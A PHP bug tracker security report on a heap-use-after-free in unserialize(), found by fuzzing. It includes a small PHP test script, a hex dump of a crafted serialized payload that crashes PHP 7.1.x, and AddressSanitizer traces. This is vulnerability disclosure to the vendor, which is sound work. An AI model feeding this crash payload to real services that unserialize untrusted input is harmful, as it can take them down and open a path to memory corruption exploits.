php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login

go to bug id or search bugs for

Sec Bug #74609 a heap-use-after-free was found at zif_unserialize function
Submitted: 2017-05-18 06:31 UTC Modified: 2017-08-12 13:14 UTC
Votes:1
Avg. Score:5.0 ± 0.0
Reproduced:0 of 0 (0.0%)
From: varsleak at gmail dot com Assigned:
Status: Duplicate Package: *General Issues
PHP Version: 7.1.6 OS: Ubuntu 1604 & Windows10
Private report: No CVE-ID: None
View Developer Edit
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: varsleak at gmail dot com
New email:
PHP Version: OS:

 

 [2017-05-18 06:31 UTC] varsleak at gmail dot com 
Description:
------------
it was found by afl.



Test script:
---------------
<?php
	if ($argc != 2) {
		print_r("" . $argv[0] . " path/to/data\n");
		return;
	}

	$poc = unserialize(file_get_contents($argv[1]));
?>

data:
4F 3A 38 3A 22 73 74 64 43 6C 61 73 73 22 3A 31
3A 7B 69 3A 30 3B 4F 3A 31 32 3A 22 44 61 74 65
49 6E 74 65 72 76 61 7A 22 3A 33 30 32 30 30 30
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30 30 35 3A 7B 73 3A
31 3A 22 79 22 3B 69 3A 30 30 3B 73 3A 31 3A 22
86 22 3B 69 3A 30 3B 73 3A 31 3A 22 64 22 3B 69
3A 30 30 30 36 30 30 3B 73 3A 31 3A 22 79 22 3B
64 3A 38 36 32 30 31 30 36 30 30 30 30 3B 73 3A
31 3A 22 73 22 3B 69 3A 2D 36 3B 73 3A 37 3A 22
30 30 F2 30 64 61 79 22 3B 64 3A 30 30 30 30 32
30 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 32 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30 30 32 30 31 30 45
39 38 3B 73 3A 31 3A 22 69 22 3B 52 3A 30 37 3B
73 3A 31 3A 22 73 22 3B 69 3A 2D 36 3B 73 3A 37
3A 22 30 30 F2 30 64 61 79 22 3B 64 3A 30 30 30
30 30 30 32 30 30 30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 45
39 38 3B 73 3A 31 3A 22 7C 22 3B 69 3A 31 30 30
31 36 36 30 34 35 37 30 30 30 30 30 30 3B 73 3A
31 3A 22 73 22 3B 64 3A 38 36 32 30 30 30 30 30
30 30 30 30 32 30 30 30 30 30 30 30 30 30 30 30
30 30 30 30 39 30 30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
30 30 30 30 32 30 30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 32 30 31 30 45 39 38 3B 73
3A 31 3A 22 69 22 3B 52 3A 2B 37 3B 73 3A 31 3A
22 73 22 3B 69 3A 2D 36 3B 73 3A 37 3A 22 30 30
F2 30 64 61 79 22 3B 64 3A 31 30 30 30 30 30 32
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
30 30 33 30 30 30 30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30 31 31 45 39 38 3B
73 3A 31 3A 22 69 22 3B 69 3A 31 30 30 30 3B 73
3A 31 3A 22 75 22 3B 69 3A 30 3B 73 3A 31 3A 22
64 22 3B 69 3A 30 30 3B 73 3A 31 3A 22 6D 22 3B
64 3A 38 36 32 30 31 30 45 39 38 3B 73 3A 31 3A
22 69 22 3B 69 3A 31 36 30 30 30 30 3B 73 3A 31
3A 22 73 22 3B 69 3A 2D 36 3B 73 3A 37 3A 22 30
30 F2 30 64 61 79 22 3B 64 3A 30 30 30 30 30 30
32 30 30 30 30 30 30 31 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 32 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30 32 30 31 30 45 39
38 3B 73 3A 31 3A 22 8C 22 3B 52 3A 30 34 3B 69
3A 30 3B 4F 3A 38 3A 22 73 74 64 43 6C 61 73 73
22 3A 33 31 3A 30 73 3A 31 3A 22 30 22 3B 61 3A
30 3A 7B 7D 73 3A 31 3A 22 62 22 3B 43 3A 31 31
3A 22 53 51 4C 69 74 65 33 D3 74 6D 74 22 3A 30
3A 7B 7D 73 3A 31 3A 22 62 22 3B 43 3A 31 31 3A
22 53 51 4C 69 74 65 33 53 74 6D 74 22 3A 30 3A
7B 7D 73 3A 31 3A 22 62 22 3B 43 3A 31 31 3A 22
53 51 4C 69 74 65 33 53 74 6D 74 22 3A 30 3A 7B
7D 73 3A 31 3A 22 62 22 3B 43 3A 31 31 3A 22 53
51 4C 69 74 65 33 53 74 6D 74 22 3A 34 33 31 3A
32 35 01 30 3B 73 3A 31 3A 22 6D 22 3B 54 3A 30
3B 73 3A 31 3A 22 64 22 3B 69 3A 30 30 39 30 36
38 30 36 30 35 3B 73 3A 31 3A 22 68 22 3B 69 3A
00 10 13 13 13 13 13 13 13 13 13 13 13 13 13 13
13 13 13 30 33 C1 33 33 33 33 33 30 44 30 30 30
32 30 30 33 33 33 33 33 33 33 33 33 33 33 38 3B
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 00 02 33 33 33 30 30 33 33 30 33
33 30 30 30 30 30 1D 25 30 30 4C 65 6E 67 74 68
45 78 63 65 70 74 69 6F 65 72 61 74 6F 72 49 74
65 72 61 44 4F 4D 43 6F 6D 6D 65 6E 74 74 6F 72
31 37 3A 22 66 00 72 64 30 79 30 30 30 22 30 30
30 31 30 30 30 3B 73 3A 34 3A 22 30 30 74 30 30
30 22 3B 69 3A 30 30 30 33 33 30 3B 73 3A 31 3A
22 64 22 3B 69 35 1B 30 33 33 30 30 69 30 30 3B
73 30 30 30 30 22 30 30 30 30 5F 30 30 30 63 30
30 30 30 72 30 30 30 30 30 76 30 22 30 30 3A 30
21 7D 30 30 6D 3A 30 3A 30 30 30 30 7D 73 3A 32
3A 22 30 30 22 3B 61 3A 31 3A 7B 69 3A 30 3B 72
3A 34 3B 7D 69 3A 30 3B 72 3A 36 3B 80 73 3A 32
3A 22 30 36 22 3B 61 3A 31 3A 7B 69 3A 30 3B 72
3A 36 3B 7D 73 3A 32 3A 22 30 37 22 3B 61 3A 31
3A 7B 69 3A 30 3B 72 3A 36 3B 7D 73 3A 32 3A 22
30 38 22 3B 61 3A 31 3A 7B 69 3A 30 3B 72 3A 36
3B 7D 73 3A 32 3A 22 30 39 22 3B 61 3A 31 3A 7B
69 3A 30 3B 72 3A 36 3B 7D 73 3A 33 3A 22 30 30
30 22 3B 61 3A 31 3A 7B 69 3A 30 3B 72 3A 36 3B
7D 73 3A 33 3A 22 30 30 31 22 3B 61 3A 31 3A 7B
69 3A 30 3B 72 3A 31 3B 7D 73 3A 33 3A 22 63 30
30 22 3B 61 3A 31 3A 7B 69 3A 30 3B 72 3A 36 3B
7D 73 3A 33 3A 22 63 30 33 22 3B 61 3A 31 3A 7B
69 3A 30 3B 72 3A 36 3B 7D 73 3A 33 3A 22 63 30
34 22 3B 61 3A 31 3A 7B 69 3A 30 3B 72 3A 36 3B
7D 73 3A 33 3A 22 63 30 35 22 3B 61 3A 31 3A 7B
69 3A 30 3B 72 3A 36 3B 7D 73 3A 33 3A 22 30 30
36 22 3B 61 3A 31 3A 7B 69 3A 30 3B 72 3A 36 3B
7D 73 3A 33 3A 22 30 31 30 22 3B 61 3A 31 3A 7B
69 3A 30 3B 72 3A 36 3B 7D 73 3A 33 3A 22 30 30
38 22 3B 61 3A 31 3A 7B 69 3A 30 3B 72 3A 36 3B
7D 73 3A 33 3A 22 30 30 39 22 3B 61 3A 31 3A 7B
69 3A 30 3B 72 3A 36 3B 7D 73 3A 33 3A 22 30 32
30 22 3B 61 3A 31 3A 7B 69 3A 30 3B 72 3A 36 3B
7D 73 3A 33 3A 22 30 32 31 22 3B 61 3A 31 3A 7B
69 3A 30 3B 72 3A 36 3B 7D 73 3A 33 3A 22 63 32
32 22 3B 61 3A 31 3A 7B 69 3A 30 3B 72 3A 36 3B
7D 73 3A 31 3A 22 64 22 3B 61 3A 31 3A 7B 69 3A
30 3B 72 3A 36 3B 7D 73 3A 31 3A 22 65 22 3B 69
3A 30 3B 73 3A 31 3A 22 66 22 3B 61 3A 32 33 3A
7B 69 3A 30 3B 61 3A 31 3A 7B 69 3A 30 3B 72 3A
36 3B 7D 69 3A 31 3B 61 3A 31 3A 7B 69 3A 30 3B
72 3A 36 3B 7D 69 3A 32 3B 61 3A 31 3A 7B 69 3A
30 3B 72 3A 36 3B 7D 69 3A 33 3B 61 3A 31 3A 7B
69 3A 30 3B 72 3A 36 3B 7D 69 3A 34 3B 61 3A 31
3A 7B 69 3A 30 3B 72 3A 36 3B 7D 69 3A 35 3B 61
3A 31 3A 7B 69 3A 30 3B 72 3A 36 3B 7D 69 3A 36
3B 61 3A 31 3A 7B 69 3A 30 3B 72 3A 36 3B 7D 69
3A 37 3B 61 3A 31 30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 3A 7B 69 3A 30 3B

use 010editor save this hex data to a file.

Expected result:
----------------
no crash.

Actual result:
--------------
USE_ZEND_ALLOC=1:

Warning: Class __PHP_Incomplete_Class has no unserializer in /home/varsleak/github/php-fuzzer/unserialize_workdir/fuzz_php.php.bak on line 7

Warning: Class SQLite3Stmt has no unserializer in /home/varsleak/github/php-fuzzer/unserialize_workdir/fuzz_php.php.bak on line 7

Warning: Class SQLite3Stmt has no unserializer in /home/varsleak/github/php-fuzzer/unserialize_workdir/fuzz_php.php.bak on line 7

Warning: Class SQLite3Stmt has no unserializer in /home/varsleak/github/php-fuzzer/unserialize_workdir/fuzz_php.php.bak on line 7
ASAN:DEADLYSIGNAL
=================================================================
==27059==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000182452b bp 0x7ffcaab8b4d0 sp 0x7ffcaab8b320 T0)
==27059==The signal is caused by a READ memory access.
==27059==Hint: address points to the zero page.
    #0 0x182452a in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:671:2
    #1 0x18298d6 in process_nested_data /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:452:8
    #2 0x182297c in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:822:7
    #3 0x18298d6 in process_nested_data /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:452:8
    #4 0x182817b in object_common2 /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:556:7
    #5 0x18261a4 in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:989:9
    #6 0x18298d6 in process_nested_data /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:452:8
    #7 0x182817b in object_common2 /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:556:7
    #8 0x18261a4 in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:989:9
    #9 0x18298d6 in process_nested_data /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:452:8
    #10 0x182817b in object_common2 /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:556:7
    #11 0x18261a4 in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:989:9
    #12 0x181c0a3 in php_var_unserialize /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:584:11
    #13 0x17c5584 in zif_unserialize /home/varsleak/github/fuzzy/php-src/ext/standard/var.c:1114:7
    #14 0x1f20e1f in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/varsleak/github/fuzzy/php-src/Zend/zend_vm_execute.h:685:2
    #15 0x1d61b89 in execute_ex /home/varsleak/github/fuzzy/php-src/Zend/zend_vm_execute.h:432:7
    #16 0x1d6269c in zend_execute /home/varsleak/github/fuzzy/php-src/Zend/zend_vm_execute.h:478:2
    #17 0x1ba9081 in zend_execute_scripts /home/varsleak/github/fuzzy/php-src/Zend/zend.c:1476:4
    #18 0x18e8da6 in php_execute_script /home/varsleak/github/fuzzy/php-src/main/main.c:2537:14
    #19 0x208b394 in do_cli /home/varsleak/github/fuzzy/php-src/sapi/cli/php_cli.c:993:5
    #20 0x2086f1d in main /home/varsleak/github/fuzzy/php-src/sapi/cli/php_cli.c:1381:18
    #21 0x7fdf86dab82f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
    #22 0x43c7d8 in _start (/home/varsleak/github/php-fuzzer/afl_php-7.1.3RC1+0x43c7d8)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:671:2 in php_var_unserialize_internal
==27059==ABORTING


************************************************************************
USE_ZEND_ALLOC=0:

Warning: Class __PHP_Incomplete_Class has no unserializer in /home/varsleak/github/php-fuzzer/unserialize_workdir/fuzz_php.php.bak on line 7

Warning: Class SQLite3Stmt has no unserializer in /home/varsleak/github/php-fuzzer/unserialize_workdir/fuzz_php.php.bak on line 7

Warning: Class SQLite3Stmt has no unserializer in /home/varsleak/github/php-fuzzer/unserialize_workdir/fuzz_php.php.bak on line 7

Warning: Class SQLite3Stmt has no unserializer in /home/varsleak/github/php-fuzzer/unserialize_workdir/fuzz_php.php.bak on line 7
ASAN:DEADLYSIGNAL
=================================================================
==27059==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000182452b bp 0x7ffcaab8b4d0 sp 0x7ffcaab8b320 T0)
==27059==The signal is caused by a READ memory access.
==27059==Hint: address points to the zero page.
    #0 0x182452a in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:671:2
    #1 0x18298d6 in process_nested_data /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:452:8
    #2 0x182297c in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:822:7
    #3 0x18298d6 in process_nested_data /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:452:8
    #4 0x182817b in object_common2 /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:556:7
    #5 0x18261a4 in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:989:9
    #6 0x18298d6 in process_nested_data /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:452:8
    #7 0x182817b in object_common2 /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:556:7
    #8 0x18261a4 in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:989:9
    #9 0x18298d6 in process_nested_data /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:452:8
    #10 0x182817b in object_common2 /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:556:7
    #11 0x18261a4 in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:989:9
    #12 0x181c0a3 in php_var_unserialize /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:584:11
    #13 0x17c5584 in zif_unserialize /home/varsleak/github/fuzzy/php-src/ext/standard/var.c:1114:7
    #14 0x1f20e1f in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/varsleak/github/fuzzy/php-src/Zend/zend_vm_execute.h:685:2
    #15 0x1d61b89 in execute_ex /home/varsleak/github/fuzzy/php-src/Zend/zend_vm_execute.h:432:7
    #16 0x1d6269c in zend_execute /home/varsleak/github/fuzzy/php-src/Zend/zend_vm_execute.h:478:2
    #17 0x1ba9081 in zend_execute_scripts /home/varsleak/github/fuzzy/php-src/Zend/zend.c:1476:4
    #18 0x18e8da6 in php_execute_script /home/varsleak/github/fuzzy/php-src/main/main.c:2537:14
    #19 0x208b394 in do_cli /home/varsleak/github/fuzzy/php-src/sapi/cli/php_cli.c:993:5
    #20 0x2086f1d in main /home/varsleak/github/fuzzy/php-src/sapi/cli/php_cli.c:1381:18
    #21 0x7fdf86dab82f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
    #22 0x43c7d8 in _start (/home/varsleak/github/php-fuzzer/afl_php-7.1.3RC1+0x43c7d8)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:671:2 in php_var_unserialize_internal
==27059==ABORTING
➜  unserialize_workdir USE_ZEND_ALLOC=0 ../afl_php-7.1.3RC1 fuzz_php.php.bak syncdir/fuzzer2/crashes/id:000000,sig:06,src:003387+001233,op:splice,rep:2 
=================================================================
==14446==ERROR: AddressSanitizer: heap-use-after-free on address 0x612000019a28 at pc 0x000001826ed1 bp 0x7ffd7b3fac90 sp 0x7ffd7b3fac88
READ of size 1 at 0x612000019a28 thread T0
    #0 0x1826ed0 in zval_get_type /home/varsleak/github/fuzzy/php-src/Zend/zend_types.h:332:18
    #1 0x1826ed0 in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:637
    #2 0x18298d6 in process_nested_data /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:452:8
    #3 0x182817b in object_common2 /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:556:7
    #4 0x18261a4 in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:989:9
    #5 0x18298d6 in process_nested_data /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:452:8
    #6 0x182817b in object_common2 /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:556:7
    #7 0x18261a4 in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:989:9
    #8 0x181c0a3 in php_var_unserialize /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:584:11
    #9 0x17c5584 in zif_unserialize /home/varsleak/github/fuzzy/php-src/ext/standard/var.c:1114:7
    #10 0x1f20e1f in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/varsleak/github/fuzzy/php-src/Zend/zend_vm_execute.h:685:2
    #11 0x1d61b89 in execute_ex /home/varsleak/github/fuzzy/php-src/Zend/zend_vm_execute.h:432:7
    #12 0x1d6269c in zend_execute /home/varsleak/github/fuzzy/php-src/Zend/zend_vm_execute.h:478:2
    #13 0x1ba9081 in zend_execute_scripts /home/varsleak/github/fuzzy/php-src/Zend/zend.c:1476:4
    #14 0x18e8da6 in php_execute_script /home/varsleak/github/fuzzy/php-src/main/main.c:2537:14
    #15 0x208b394 in do_cli /home/varsleak/github/fuzzy/php-src/sapi/cli/php_cli.c:993:5
    #16 0x2086f1d in main /home/varsleak/github/fuzzy/php-src/sapi/cli/php_cli.c:1381:18
    #17 0x7fd2393a582f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
    #18 0x43c7d8 in _start (/home/varsleak/github/php-fuzzer/afl_php-7.1.3RC1+0x43c7d8)

0x612000019a28 is located 104 bytes inside of 288-byte region [0x6120000199c0,0x612000019ae0)
freed by thread T0 here:
    #0 0x4f7380 in __interceptor_cfree.localalias.0 /home/varsleak/github/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:55
    #1 0x1a6b764 in _efree /home/varsleak/github/fuzzy/php-src/Zend/zend_alloc.c:2428:4

previously allocated by thread T0 here:
    #0 0x4f7538 in __interceptor_malloc /home/varsleak/github/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:66
    #1 0x1a6c5b8 in __zend_malloc /home/varsleak/github/fuzzy/php-src/Zend/zend_alloc.c:2820:14

SUMMARY: AddressSanitizer: heap-use-after-free /home/varsleak/github/fuzzy/php-src/Zend/zend_types.h:332:18 in zval_get_type
Shadow bytes around the buggy address:
  0x0c247fffb2f0: 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa
  0x0c247fffb300: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c247fffb310: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c247fffb320: 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa
  0x0c247fffb330: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
=>0x0c247fffb340: fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd
  0x0c247fffb350: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa
  0x0c247fffb360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fffb370: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fffb380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fffb390: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==14446==ABORTING

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2017-05-18 06:35 UTC] varsleak at gmail dot com
-Summary: a heap-buffer-overflow was found at zif_unserialize function +Summary: a heap-use-after-free was found at zif_unserialize function
 [2017-05-18 06:35 UTC] varsleak at gmail dot com 
a heap-use-after-free vulnerability.
 [2017-05-18 06:56 UTC] whitehat002 at hotmail dot com 
Is this the result of using the fuzz tool?How do you make sure it is a 'use after free' bug?
 [2017-05-18 10:16 UTC] varsleak at gmail dot com 
This is the result of recompiled PHP-7.1.5 without modify:

➜  php-orig git:(PHP-7.1.5) ✗ ./configure --disable-shared --enable-static CFLAGS="-g -ggdb -fsanitize=address -fsanitize-coverage=trace-cmp,trace-pc-guard,indirect-calls" CXXFLAGS="-g -ggdb -fsanitize=address -fsanitize-coverage=trace-cmp,trace-pc-guard,indirect-calls" CC=clang CXX=clang++ LIBS="-lXpm"



➜  php-orig git:(PHP-7.1.5) ✗ USE_ZEND_ALLOC=0 sapi/cli/php ~/github/php-src-vul/heap-use-after-free/fuzzer.php ~/github/php-src-vul/heap-use-after-free/heap-use-after-free.data 
=================================================================
==29990==ERROR: AddressSanitizer: heap-use-after-free on address 0x612000019d28 at pc 0x0000015f54b6 bp 0x7ffcb6c37360 sp 0x7ffcb6c37358
READ of size 1 at 0x612000019d28 thread T0
    #0 0x15f54b5 in zval_get_type /home/varsleak/github/php-orig/Zend/zend_types.h:332:18
    #1 0x15fa035 in php_var_unserialize_internal /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:637:6
    #2 0x160332a in process_nested_data /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:452:8
    #3 0x16011d6 in object_common2 /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:556:7
    #4 0x15fd663 in php_var_unserialize_internal /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:989:9
    #5 0x160332a in process_nested_data /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:452:8
    #6 0x16011d6 in object_common2 /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:556:7
    #7 0x15fd663 in php_var_unserialize_internal /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:989:9
    #8 0x15f56d0 in php_var_unserialize /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:584:11
    #9 0x15b2944 in zif_unserialize /home/varsleak/github/php-orig/ext/standard/var.c:1114:7
    #10 0x1cafc1c in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/varsleak/github/php-orig/Zend/zend_vm_execute.h:675:2
    #11 0x1b04811 in execute_ex /home/varsleak/github/php-orig/Zend/zend_vm_execute.h:432:7
    #12 0x1b04f50 in zend_execute /home/varsleak/github/php-orig/Zend/zend_vm_execute.h:474:2
    #13 0x196bb51 in zend_execute_scripts /home/varsleak/github/php-orig/Zend/zend.c:1476:4
    #14 0x16d1f22 in php_execute_script /home/varsleak/github/php-orig/main/main.c:2537:14
    #15 0x1e2ec61 in do_cli /home/varsleak/github/php-orig/sapi/cli/php_cli.c:993:5
    #16 0x1e2b6dc in main /home/varsleak/github/php-orig/sapi/cli/php_cli.c:1381:18
    #17 0x7f9c5985b82f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
    #18 0x43c298 in _start (/home/varsleak/github/php-orig/sapi/cli/php+0x43c298)

0x612000019d28 is located 104 bytes inside of 288-byte region [0x612000019cc0,0x612000019de0)
freed by thread T0 here:
    #0 0x4f6e40 in __interceptor_cfree.localalias.0 /home/varsleak/github/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:55
    #1 0x1864b39 in _efree /home/varsleak/github/php-orig/Zend/zend_alloc.c:2428:4
    #2 0x19df0af in zend_hash_do_resize /home/varsleak/github/php-orig/Zend/zend_hash.c:867:3
    #3 0x19c72c6 in _zend_hash_add_or_update_i /home/varsleak/github/php-orig/Zend/zend_hash.c:590:2
    #4 0x19c7cf0 in _zend_hash_add_new /home/varsleak/github/php-orig/Zend/zend_hash.c:637:9
    #5 0x160320c in process_nested_data /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:440:13
    #6 0x16011d6 in object_common2 /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:556:7
    #7 0x15fd663 in php_var_unserialize_internal /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:989:9
    #8 0x160332a in process_nested_data /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:452:8
    #9 0x16011d6 in object_common2 /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:556:7
    #10 0x15fd663 in php_var_unserialize_internal /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:989:9
    #11 0x15f56d0 in php_var_unserialize /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:584:11
    #12 0x15b2944 in zif_unserialize /home/varsleak/github/php-orig/ext/standard/var.c:1114:7
    #13 0x1cafc1c in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/varsleak/github/php-orig/Zend/zend_vm_execute.h:675:2
    #14 0x1b04811 in execute_ex /home/varsleak/github/php-orig/Zend/zend_vm_execute.h:432:7
    #15 0x1b04f50 in zend_execute /home/varsleak/github/php-orig/Zend/zend_vm_execute.h:474:2
    #16 0x196bb51 in zend_execute_scripts /home/varsleak/github/php-orig/Zend/zend.c:1476:4
    #17 0x16d1f22 in php_execute_script /home/varsleak/github/php-orig/main/main.c:2537:14
    #18 0x1e2ec61 in do_cli /home/varsleak/github/php-orig/sapi/cli/php_cli.c:993:5
    #19 0x1e2b6dc in main /home/varsleak/github/php-orig/sapi/cli/php_cli.c:1381:18
    #20 0x7f9c5985b82f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291

previously allocated by thread T0 here:
    #0 0x4f6ff8 in __interceptor_malloc /home/varsleak/github/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:66
    #1 0x186570b in __zend_malloc /home/varsleak/github/php-orig/Zend/zend_alloc.c:2820:14
    #2 0x186485e in _emalloc /home/varsleak/github/php-orig/Zend/zend_alloc.c:2413:11
    #3 0x19bcb5e in zend_hash_real_init_ex /home/varsleak/github/php-orig/Zend/zend_hash.c:138:3
    #4 0x19c1227 in zend_hash_check_init /home/varsleak/github/php-orig/Zend/zend_hash.c:161:3
    #5 0x19c6b8b in _zend_hash_add_or_update_i /home/varsleak/github/php-orig/Zend/zend_hash.c:551:3
    #6 0x19c81e7 in _zend_hash_str_update /home/varsleak/github/php-orig/Zend/zend_hash.c:651:14
    #7 0x15c567e in php_store_class_name /home/varsleak/github/php-orig/ext/standard/incomplete_class.c:159:2
    #8 0x15fd62f in php_var_unserialize_internal /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:985:3
    #9 0x160332a in process_nested_data /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:452:8
    #10 0x16011d6 in object_common2 /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:556:7
    #11 0x15fd663 in php_var_unserialize_internal /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:989:9
    #12 0x15f56d0 in php_var_unserialize /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:584:11
    #13 0x15b2944 in zif_unserialize /home/varsleak/github/php-orig/ext/standard/var.c:1114:7
    #14 0x1cafc1c in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/varsleak/github/php-orig/Zend/zend_vm_execute.h:675:2
    #15 0x1b04811 in execute_ex /home/varsleak/github/php-orig/Zend/zend_vm_execute.h:432:7
    #16 0x1b04f50 in zend_execute /home/varsleak/github/php-orig/Zend/zend_vm_execute.h:474:2
    #17 0x196bb51 in zend_execute_scripts /home/varsleak/github/php-orig/Zend/zend.c:1476:4
    #18 0x16d1f22 in php_execute_script /home/varsleak/github/php-orig/main/main.c:2537:14
    #19 0x1e2ec61 in do_cli /home/varsleak/github/php-orig/sapi/cli/php_cli.c:993:5
    #20 0x1e2b6dc in main /home/varsleak/github/php-orig/sapi/cli/php_cli.c:1381:18
